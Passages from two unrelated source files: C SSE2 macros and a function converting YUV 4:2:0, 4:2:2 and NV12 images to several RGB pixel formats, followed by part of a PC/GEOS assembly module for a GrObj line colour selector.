G1 = _mm_srai_epi16(_mm_add_epi16(G1, Y1), PRECISION); \
B1 = _mm_srai_epi16(_mm_add_epi16(B1, Y1), PRECISION); \
R2 = _mm_srai_epi16(_mm_add_epi16(R2, Y2), PRECISION); \
G2 = _mm_srai_epi16(_mm_add_epi16(G2, Y2), PRECISION); \
B2 = _mm_srai_epi16(_mm_add_epi16(B2, Y2), PRECISION); \
#define PACK_RGB565_32(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4) \
{ \
__m128i red_mask, tmp1, tmp2, tmp3, tmp4; \
\
red_mask = _mm_set1_epi16((short)0xF800); \
RGB1 = _mm_and_si128(_mm_unpacklo_epi8(_mm_setzero_si128(), R1), red_mask); \
RGB2 = _mm_and_si128(_mm_unpackhi_epi8(_mm_setzero_si128(), R1), red_mask); \
RGB3 = _mm_and_si128(_mm_unpacklo_epi8(_mm_setzero_si128(), R2), red_mask); \
RGB4 = _mm_and_si128(_mm_unpackhi_epi8(_mm_setzero_si128(), R2), red_mask); \
tmp1 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpacklo_epi8(G1, _mm_setzero_si128()), 2), 5); \
tmp2 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpackhi_epi8(G1, _mm_setzero_si128()), 2), 5); \
tmp3 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpacklo_epi8(G2, _mm_setzero_si128()), 2), 5); \
tmp4 = _mm_slli_epi16(_mm_srli_epi16(_mm_unpackhi_epi8(G2, _mm_setzero_si128()), 2), 5); \
RGB1 = _mm_or_si128(RGB1, tmp1); \
RGB2 = _mm_or_si128(RGB2, tmp2); \
RGB3 = _mm_or_si128(RGB3, tmp3); \
RGB4 = _mm_or_si128(RGB4, tmp4); \
tmp1 = _mm_srli_epi16(_mm_unpacklo_epi8(B1, _mm_setzero_si128()), 3); \
tmp2 = _mm_srli_epi16(_mm_unpackhi_epi8(B1, _mm_setzero_si128()), 3); \
tmp3 = _mm_srli_epi16(_mm_unpacklo_epi8(B2, _mm_setzero_si128()), 3); \
tmp4 = _mm_srli_epi16(_mm_unpackhi_epi8(B2, _mm_setzero_si128()), 3); \
RGB1 = _mm_or_si128(RGB1, tmp1); \
RGB2 = _mm_or_si128(RGB2, tmp2); \
RGB3 = _mm_or_si128(RGB3, tmp3); \
RGB4 = _mm_or_si128(RGB4, tmp4); \
}
#define PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
RGB1 = _mm_packus_epi16(_mm_and_si128(R1,_mm_set1_epi16(0xFF)), _mm_and_si128(R2,_mm_set1_epi16(0xFF))); \
RGB2 = _mm_packus_epi16(_mm_and_si128(G1,_mm_set1_epi16(0xFF)), _mm_and_si128(G2,_mm_set1_epi16(0xFF))); \
RGB3 = _mm_packus_epi16(_mm_and_si128(B1,_mm_set1_epi16(0xFF)), _mm_and_si128(B2,_mm_set1_epi16(0xFF))); \
RGB4 = _mm_packus_epi16(_mm_srli_epi16(R1,8), _mm_srli_epi16(R2,8)); \
RGB5 = _mm_packus_epi16(_mm_srli_epi16(G1,8), _mm_srli_epi16(G2,8)); \
RGB6 = _mm_packus_epi16(_mm_srli_epi16(B1,8), _mm_srli_epi16(B2,8)); \
#define PACK_RGB24_32_STEP2(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
R1 = _mm_packus_epi16(_mm_and_si128(RGB1,_mm_set1_epi16(0xFF)), _mm_and_si128(RGB2,_mm_set1_epi16(0xFF))); \
R2 = _mm_packus_epi16(_mm_and_si128(RGB3,_mm_set1_epi16(0xFF)), _mm_and_si128(RGB4,_mm_set1_epi16(0xFF))); \
G1 = _mm_packus_epi16(_mm_and_si128(RGB5,_mm_set1_epi16(0xFF)), _mm_and_si128(RGB6,_mm_set1_epi16(0xFF))); \
G2 = _mm_packus_epi16(_mm_srli_epi16(RGB1,8), _mm_srli_epi16(RGB2,8)); \
B1 = _mm_packus_epi16(_mm_srli_epi16(RGB3,8), _mm_srli_epi16(RGB4,8)); \
B2 = _mm_packus_epi16(_mm_srli_epi16(RGB5,8), _mm_srli_epi16(RGB6,8)); \
#define PACK_RGB24_32(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP2(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP2(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
PACK_RGB24_32_STEP1(R1, R2, G1, G2, B1, B2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6) \
#define PACK_RGBA_32(R1, R2, G1, G2, B1, B2, A1, A2, RGB1, RGB2, RGB3, RGB4, RGB5, RGB6, RGB7, RGB8) \
{ \
__m128i lo_ab, hi_ab, lo_gr, hi_gr; \
\
lo_ab = _mm_unpacklo_epi8( A1, B1 ); \
hi_ab = _mm_unpackhi_epi8( A1, B1 ); \
lo_gr = _mm_unpacklo_epi8( G1, R1 ); \
hi_gr = _mm_unpackhi_epi8( G1, R1 ); \
RGB1 = _mm_unpacklo_epi16( lo_ab, lo_gr ); \
RGB2 = _mm_unpackhi_epi16( lo_ab, lo_gr ); \
RGB3 = _mm_unpacklo_epi16( hi_ab, hi_gr ); \
RGB4 = _mm_unpackhi_epi16( hi_ab, hi_gr ); \
\
lo_ab = _mm_unpacklo_epi8( A2, B2 ); \
hi_ab = _mm_unpackhi_epi8( A2, B2 ); \
lo_gr = _mm_unpacklo_epi8( G2, R2 ); \
hi_gr = _mm_unpackhi_epi8( G2, R2 ); \
RGB5 = _mm_unpacklo_epi16( lo_ab, lo_gr ); \
RGB6 = _mm_unpackhi_epi16( lo_ab, lo_gr ); \
RGB7 = _mm_unpacklo_epi16( hi_ab, hi_gr ); \
RGB8 = _mm_unpackhi_epi16( hi_ab, hi_gr ); \
}
#if RGB_FORMAT == RGB_FORMAT_RGB565
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
\
PACK_RGB565_32(r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, rgb_1, rgb_2, rgb_3, rgb_4) \
\
PACK_RGB565_32(r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, rgb_5, rgb_6, rgb_7, rgb_8) \
#elif RGB_FORMAT == RGB_FORMAT_RGB24
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6; \
__m128i rgb_7, rgb_8, rgb_9, rgb_10, rgb_11, rgb_12; \
\
PACK_RGB24_32(r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6) \
\
PACK_RGB24_32(r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, rgb_7, rgb_8, rgb_9, rgb_10, rgb_11, rgb_12) \
#elif RGB_FORMAT == RGB_FORMAT_RGBA
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, a, a, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, a, a, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
#elif RGB_FORMAT == RGB_FORMAT_BGRA
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(b_8_11, b_8_12, g_8_11, g_8_12, r_8_11, r_8_12, a, a, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(b_8_21, b_8_22, g_8_21, g_8_22, r_8_21, r_8_22, a, a, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
#elif RGB_FORMAT == RGB_FORMAT_ARGB
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(a, a, r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(a, a, r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
#elif RGB_FORMAT == RGB_FORMAT_ABGR
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(a, a, b_8_11, b_8_12, g_8_11, g_8_12, r_8_11, r_8_12, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(a, a, b_8_21, b_8_22, g_8_21, g_8_22, r_8_21, r_8_22, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
#else
#error PACK_PIXEL unimplemented
#endif
#if RGB_FORMAT == RGB_FORMAT_RGB565
#define SAVE_LINE1 \
SAVE_SI128((__m128i*)(rgb_ptr1), rgb_1); \
SAVE_SI128((__m128i*)(rgb_ptr1+16), rgb_2); \
SAVE_SI128((__m128i*)(rgb_ptr1+32), rgb_3); \
SAVE_SI128((__m128i*)(rgb_ptr1+48), rgb_4); \
#define SAVE_LINE2 \
SAVE_SI128((__m128i*)(rgb_ptr2), rgb_5); \
SAVE_SI128((__m128i*)(rgb_ptr2+16), rgb_6); \
SAVE_SI128((__m128i*)(rgb_ptr2+32), rgb_7); \
SAVE_SI128((__m128i*)(rgb_ptr2+48), rgb_8); \
#elif RGB_FORMAT == RGB_FORMAT_RGB24
#define SAVE_LINE1 \
SAVE_SI128((__m128i*)(rgb_ptr1), rgb_1); \
SAVE_SI128((__m128i*)(rgb_ptr1+16), rgb_2); \
SAVE_SI128((__m128i*)(rgb_ptr1+32), rgb_3); \
SAVE_SI128((__m128i*)(rgb_ptr1+48), rgb_4); \
SAVE_SI128((__m128i*)(rgb_ptr1+64), rgb_5); \
SAVE_SI128((__m128i*)(rgb_ptr1+80), rgb_6); \
#define SAVE_LINE2 \
SAVE_SI128((__m128i*)(rgb_ptr2), rgb_7); \
SAVE_SI128((__m128i*)(rgb_ptr2+16), rgb_8); \
SAVE_SI128((__m128i*)(rgb_ptr2+32), rgb_9); \
SAVE_SI128((__m128i*)(rgb_ptr2+48), rgb_10); \
SAVE_SI128((__m128i*)(rgb_ptr2+64), rgb_11); \
SAVE_SI128((__m128i*)(rgb_ptr2+80), rgb_12); \
#elif RGB_FORMAT == RGB_FORMAT_RGBA || RGB_FORMAT == RGB_FORMAT_BGRA || \
RGB_FORMAT == RGB_FORMAT_ARGB || RGB_FORMAT == RGB_FORMAT_ABGR
#define SAVE_LINE1 \
SAVE_SI128((__m128i*)(rgb_ptr1), rgb_1); \
SAVE_SI128((__m128i*)(rgb_ptr1+16), rgb_2); \
SAVE_SI128((__m128i*)(rgb_ptr1+32), rgb_3); \
SAVE_SI128((__m128i*)(rgb_ptr1+48), rgb_4); \
SAVE_SI128((__m128i*)(rgb_ptr1+64), rgb_5); \
SAVE_SI128((__m128i*)(rgb_ptr1+80), rgb_6); \
SAVE_SI128((__m128i*)(rgb_ptr1+96), rgb_7); \
SAVE_SI128((__m128i*)(rgb_ptr1+112), rgb_8); \
#define SAVE_LINE2 \
SAVE_SI128((__m128i*)(rgb_ptr2), rgb_9); \
SAVE_SI128((__m128i*)(rgb_ptr2+16), rgb_10); \
SAVE_SI128((__m128i*)(rgb_ptr2+32), rgb_11); \
SAVE_SI128((__m128i*)(rgb_ptr2+48), rgb_12); \
SAVE_SI128((__m128i*)(rgb_ptr2+64), rgb_13); \
SAVE_SI128((__m128i*)(rgb_ptr2+80), rgb_14); \
SAVE_SI128((__m128i*)(rgb_ptr2+96), rgb_15); \
SAVE_SI128((__m128i*)(rgb_ptr2+112), rgb_16); \
#else
#error SAVE_LINE unimplemented
#endif
#if YUV_FORMAT == YUV_FORMAT_420
#define READ_Y(y_ptr) \
y = LOAD_SI128((const __m128i*)(y_ptr)); \
#define READ_UV \
u = LOAD_SI128((const __m128i*)(u_ptr)); \
v = LOAD_SI128((const __m128i*)(v_ptr)); \
#elif YUV_FORMAT == YUV_FORMAT_422
#define READ_Y(y_ptr) \
{ \
__m128i y1, y2; \
y1 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(y_ptr)), 8), 8); \
y2 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(y_ptr+16)), 8), 8); \
y = _mm_packus_epi16(y1, y2); \
}
#define READ_UV \
{ \
__m128i u1, u2, u3, u4, v1, v2, v3, v4; \
u1 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr)), 24), 24); \
u2 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr+16)), 24), 24); \
u3 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr+32)), 24), 24); \
u4 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr+48)), 24), 24); \
u = _mm_packus_epi16(_mm_packs_epi32(u1, u2), _mm_packs_epi32(u3, u4)); \
v1 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr)), 24), 24); \
v2 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr+16)), 24), 24); \
v3 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr+32)), 24), 24); \
v4 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr+48)), 24), 24); \
v = _mm_packus_epi16(_mm_packs_epi32(v1, v2), _mm_packs_epi32(v3, v4)); \
}
#elif YUV_FORMAT == YUV_FORMAT_NV12
#define READ_Y(y_ptr) \
y = LOAD_SI128((const __m128i*)(y_ptr)); \
#define READ_UV \
{ \
__m128i u1, u2, v1, v2; \
u1 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(u_ptr)), 8), 8); \
u2 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(u_ptr+16)), 8), 8); \
u = _mm_packus_epi16(u1, u2); \
v1 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(v_ptr)), 8), 8); \
v2 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(v_ptr+16)), 8), 8); \
v = _mm_packus_epi16(v1, v2); \
}
#else
#error READ_UV unimplemented
#endif
#define YUV2RGB_32 \
__m128i r_tmp, g_tmp, b_tmp; \
__m128i r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2; \
__m128i r_uv_16_1, g_uv_16_1, b_uv_16_1, r_uv_16_2, g_uv_16_2, b_uv_16_2; \
__m128i y_16_1, y_16_2; \
__m128i y, u, v, u_16, v_16; \
__m128i r_8_11, g_8_11, b_8_11, r_8_21, g_8_21, b_8_21; \
__m128i r_8_12, g_8_12, b_8_12, r_8_22, g_8_22, b_8_22; \
\
READ_UV \
\
/* process first 16 pixels of first line */\
u_16 = _mm_unpacklo_epi8(u, _mm_setzero_si128()); \
v_16 = _mm_unpacklo_epi8(v, _mm_setzero_si128()); \
u_16 = _mm_add_epi16(u_16, _mm_set1_epi16(-128)); \
v_16 = _mm_add_epi16(v_16, _mm_set1_epi16(-128)); \
\
UV2RGB_16(u_16, v_16, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
r_uv_16_1=r_16_1; g_uv_16_1=g_16_1; b_uv_16_1=b_16_1; \
r_uv_16_2=r_16_2; g_uv_16_2=g_16_2; b_uv_16_2=b_16_2; \
\
READ_Y(y_ptr1) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_11 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_11 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_11 = _mm_packus_epi16(b_16_1, b_16_2); \
\
/* process first 16 pixels of second line */\
r_16_1=r_uv_16_1; g_16_1=g_uv_16_1; b_16_1=b_uv_16_1; \
r_16_2=r_uv_16_2; g_16_2=g_uv_16_2; b_16_2=b_uv_16_2; \
\
READ_Y(y_ptr2) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_21 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_21 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_21 = _mm_packus_epi16(b_16_1, b_16_2); \
\
/* process last 16 pixels of first line */\
u_16 = _mm_unpackhi_epi8(u, _mm_setzero_si128()); \
v_16 = _mm_unpackhi_epi8(v, _mm_setzero_si128()); \
u_16 = _mm_add_epi16(u_16, _mm_set1_epi16(-128)); \
v_16 = _mm_add_epi16(v_16, _mm_set1_epi16(-128)); \
\
UV2RGB_16(u_16, v_16, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
r_uv_16_1=r_16_1; g_uv_16_1=g_16_1; b_uv_16_1=b_16_1; \
r_uv_16_2=r_16_2; g_uv_16_2=g_16_2; b_uv_16_2=b_16_2; \
\
READ_Y(y_ptr1+16*y_pixel_stride) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_12 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_12 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_12 = _mm_packus_epi16(b_16_1, b_16_2); \
\
/* process last 16 pixels of second line */\
r_16_1=r_uv_16_1; g_16_1=g_uv_16_1; b_16_1=b_uv_16_1; \
r_16_2=r_uv_16_2; g_16_2=g_uv_16_2; b_16_2=b_uv_16_2; \
\
READ_Y(y_ptr2+16*y_pixel_stride) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_22 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_22 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_22 = _mm_packus_epi16(b_16_1, b_16_2); \
\
void SSE_FUNCTION_NAME(uint32_t width, uint32_t height,
const uint8_t *Y, const uint8_t *U, const uint8_t *V, uint32_t Y_stride, uint32_t UV_stride,
uint8_t *RGB, uint32_t RGB_stride,
YCbCrType yuv_type)
{
const YUV2RGBParam *const param = &(YUV2RGB[yuv_type]);
#if YUV_FORMAT == YUV_FORMAT_420
const int y_pixel_stride = 1;
const int uv_pixel_stride = 1;
const int uv_x_sample_interval = 2;
const int uv_y_sample_interval = 2;
#elif YUV_FORMAT == YUV_FORMAT_422
const int y_pixel_stride = 2;
const int uv_pixel_stride = 4;
const int uv_x_sample_interval = 2;
const int uv_y_sample_interval = 1;
#elif YUV_FORMAT == YUV_FORMAT_NV12
const int y_pixel_stride = 1;
const int uv_pixel_stride = 2;
const int uv_x_sample_interval = 2;
const int uv_y_sample_interval = 2;
#endif
#if RGB_FORMAT == RGB_FORMAT_RGB565
const int rgb_pixel_stride = 2;
#elif RGB_FORMAT == RGB_FORMAT_RGB24
const int rgb_pixel_stride = 3;
#elif RGB_FORMAT == RGB_FORMAT_RGBA || RGB_FORMAT == RGB_FORMAT_BGRA || \
RGB_FORMAT == RGB_FORMAT_ARGB || RGB_FORMAT == RGB_FORMAT_ABGR
const int rgb_pixel_stride = 4;
#else
#error Unknown RGB pixel size
#endif
if (width >= 32) {
uint32_t xpos, ypos;
for(ypos=0; ypos<(height-(uv_y_sample_interval-1)); ypos+=uv_y_sample_interval)
{
const uint8_t *y_ptr1=Y+ypos*Y_stride,
*y_ptr2=Y+(ypos+1)*Y_stride,
*u_ptr=U+(ypos/uv_y_sample_interval)*UV_stride,
*v_ptr=V+(ypos/uv_y_sample_interval)*UV_stride;
uint8_t *rgb_ptr1=RGB+ypos*RGB_stride,
*rgb_ptr2=RGB+(ypos+1)*RGB_stride;
for(xpos=0; xpos<(width-31); xpos+=32)
{
YUV2RGB_32
{
PACK_PIXEL
SAVE_LINE1
if (uv_y_sample_interval > 1)
{
SAVE_LINE2
}
}
y_ptr1+=32*y_pixel_stride;
y_ptr2+=32*y_pixel_stride;
u_ptr+=32*uv_pixel_stride/uv_x_sample_interval;
v_ptr+=32*uv_pixel_stride/uv_x_sample_interval;
rgb_ptr1+=32*rgb_pixel_stride;
rgb_ptr2+=32*rgb_pixel_stride;
}
}
/* Catch the last line, if needed */
if (uv_y_sample_interval == 2 && ypos == (height-1))
{
const uint8_t *y_ptr=Y+ypos*Y_stride,
*u_ptr=U+(ypos/uv_y_sample_interval)*UV_stride,
*v_ptr=V+(ypos/uv_y_sample_interval)*UV_stride;
uint8_t *rgb_ptr=RGB+ypos*RGB_stride;
STD_FUNCTION_NAME(width, 1, y_ptr, u_ptr, v_ptr, Y_stride, UV_stride, rgb_ptr, RGB_stride, yuv_type);
}
}
/* Catch the right column, if needed */
{
int converted = (width & ~31);
if (converted != width)
{
const uint8_t *y_ptr=Y+converted*y_pixel_stride,
*u_ptr=U+converted*uv_pixel_stride/uv_x_sample_interval,
*v_ptr=V+converted*uv_pixel_stride/uv_x_sample_interval;
uint8_t *rgb_ptr=RGB+converted*rgb_pixel_stride;
STD_FUNCTION_NAME(width-converted, height, y_ptr, u_ptr, v_ptr, Y_stride, UV_stride, rgb_ptr, RGB_stride, yuv_type);
}
}
}
#undef SSE_FUNCTION_NAME
#undef STD_FUNCTION_NAME
#undef YUV_FORMAT
#undef RGB_FORMAT
#undef SSE_ALIGNED
#undef LOAD_SI128
#undef SAVE_SI128
#undef UV2RGB_16
#undef ADD_Y2RGB_16
#undef PACK_RGB24_32_STEP1
#undef PACK_RGB24_32_STEP2
#undef PACK_RGB24_32
#undef PACK_RGBA_32
#undef PACK_PIXEL
#undef SAVE_LINE1
#undef SAVE_LINE2
#undef READ_Y
#undef READ_UV
#undef YUV2RGB_32
| {
"language": "Assembly"
} |
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1991 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: uiLineColorSelector.asm
AUTHOR: Jon Witort
REVISION HISTORY:
Name Date Description
---- ---- -----------
jon 24 feb 1992 Initial version.
DESCRIPTION:
Code for the GrObjLineColorSelectorClass
$Id: uiLineColorSelector.asm,v 1.1 97/04/04 18:06:57 newdeal Exp $
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GrObjUIControllerCode segment resource
COMMENT @----------------------------------------------------------------------
MESSAGE: GrObjLineColorSelectorGetInfo --
MSG_GEN_CONTROL_GET_INFO for GrObjLineColorSelectorClass
DESCRIPTION: Return group
PASS:
*ds:si - instance data
es - segment of GrObjLineColorSelectorClass
ax - The message
RETURN:
cx:dx - list of children
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 10/31/91 Initial version
------------------------------------------------------------------------------@
GrObjLineColorSelectorGetInfo method dynamic GrObjLineColorSelectorClass,
MSG_GEN_CONTROL_GET_INFO
; first call our superclass to get the color selector's stuff
pushdw cxdx
mov di, offset GrObjLineColorSelectorClass
call ObjCallSuperNoLock
; now fill in a few things
popdw esdi
mov si, offset GOLCS_newFields
mov cx, length GOLCS_newFields
call CopyFieldsToBuildInfo
ret
GrObjLineColorSelectorGetInfo endm
GOLCS_newFields GC_NewField \
<offset GCBI_flags, size GCBI_flags,
<GCD_dword mask GCBF_SUSPEND_ON_APPLY>>,
<offset GCBI_initFileKey, size GCBI_initFileKey,
<GCD_dword GOLCS_IniFileKey>>,
<offset GCBI_gcnList, size GCBI_gcnList,
<GCD_dword GOLCS_gcnList>>,
<offset GCBI_gcnCount, size GCBI_gcnCount,
<GCD_dword size GOLCS_gcnList>>,
<offset GCBI_notificationList, size GCBI_notificationList,
<GCD_dword GOLCS_notifyList>>,
<offset GCBI_notificationCount, size GCBI_notificationCount,
<GCD_dword size GOLCS_notifyList>>,
<offset GCBI_controllerName, size GCBI_controllerName,
<GCD_optr GOLCSName>>,
<offset GCBI_features, size GCBI_features,
<GCD_dword GOLCC_DEFAULT_FEATURES>>,
<offset GCBI_toolFeatures, size GCBI_toolFeatures,
<GCD_dword GOLCC_DEFAULT_TOOLBOX_FEATURES>>,
<offset GCBI_helpContext, size GCBI_helpContext,
<GCD_dword GOLCS_helpContext>>
if FULL_EXECUTE_IN_PLACE
GrObjControlInfoXIP segment resource
endif
GOLCS_helpContext char "dbGrObjLiClr", 0
GOLCS_IniFileKey char "GrObjLineColor", 0
GOLCS_gcnList GCNListType \
<MANUFACTURER_ID_GEOWORKS, GAGCNLT_APP_TARGET_NOTIFY_GROBJ_LINE_ATTR_CHANGE>
GOLCS_notifyList NotificationType \
<MANUFACTURER_ID_GEOWORKS, GWNT_GROBJ_LINE_ATTR_CHANGE>
if FULL_EXECUTE_IN_PLACE
GrObjControlInfoXIP ends
endif
COMMENT @----------------------------------------------------------------------
MESSAGE: GrObjLineColorSelectorOutputAction -- MSG_GEN_OUTPUT_ACTION
for GrObjLineColorSelectorClass
DESCRIPTION: Intercept ColorSelector output that we want
PASS:
*ds:si - instance data
es - segment of GrObjLineColorSelectorClass
ax - The message
cx:dx - destination (or travel option)
bp - event
RETURN:
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 3/24/92 Initial version
------------------------------------------------------------------------------@
GrObjLineColorSelectorOutputAction method dynamic GrObjLineColorSelectorClass,
MSG_GEN_OUTPUT_ACTION
mov di, offset GrObjLineColorSelectorClass
call ColorInterceptAction
ret
GrObjLineColorSelectorOutputAction endm
COMMENT @----------------------------------------------------------------------
MESSAGE: GrObjLineColorSelectorSetColor -- MSG_META_COLORED_OBJECT_SET_COLOR
for GrObjLineColorSelectorClass
DESCRIPTION: Handle a color change
PASS:
*ds:si - instance data
es - segment of GrObjLineColorSelectorClass
ax - The message
dxcx - color
RETURN:
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 3/24/92 Initial version
------------------------------------------------------------------------------@
GrObjLineColorSelectorSetColor method dynamic GrObjLineColorSelectorClass,
MSG_META_COLORED_OBJECT_SET_COLOR
uses ax, cx, dx, bp
.enter
; if passed index then convert to RGB
cmp ch, CF_RGB
jz rgb
; must convert index to rgb
xchgdw dxcx, bxax
clr di
mov ah, al ;ah = index
call GrMapColorIndex ;al <- red, bl <- green, bh <- blue
xchgdw dxcx, bxax
rgb:
; cl = red, dl = green, dh = blue
mov ch, dl
mov dl, dh
mov ax, MSG_GO_SET_LINE_COLOR
call GrObjControlOutputActionRegsToGrObjs
.leave
ret
GrObjLineColorSelectorSetColor endm
;---
GrObjLineColorSelectorSetDrawMask method dynamic GrObjLineColorSelectorClass, MSG_META_COLORED_OBJECT_SET_DRAW_MASK
.enter
mov ax, MSG_GO_SET_LINE_MASK
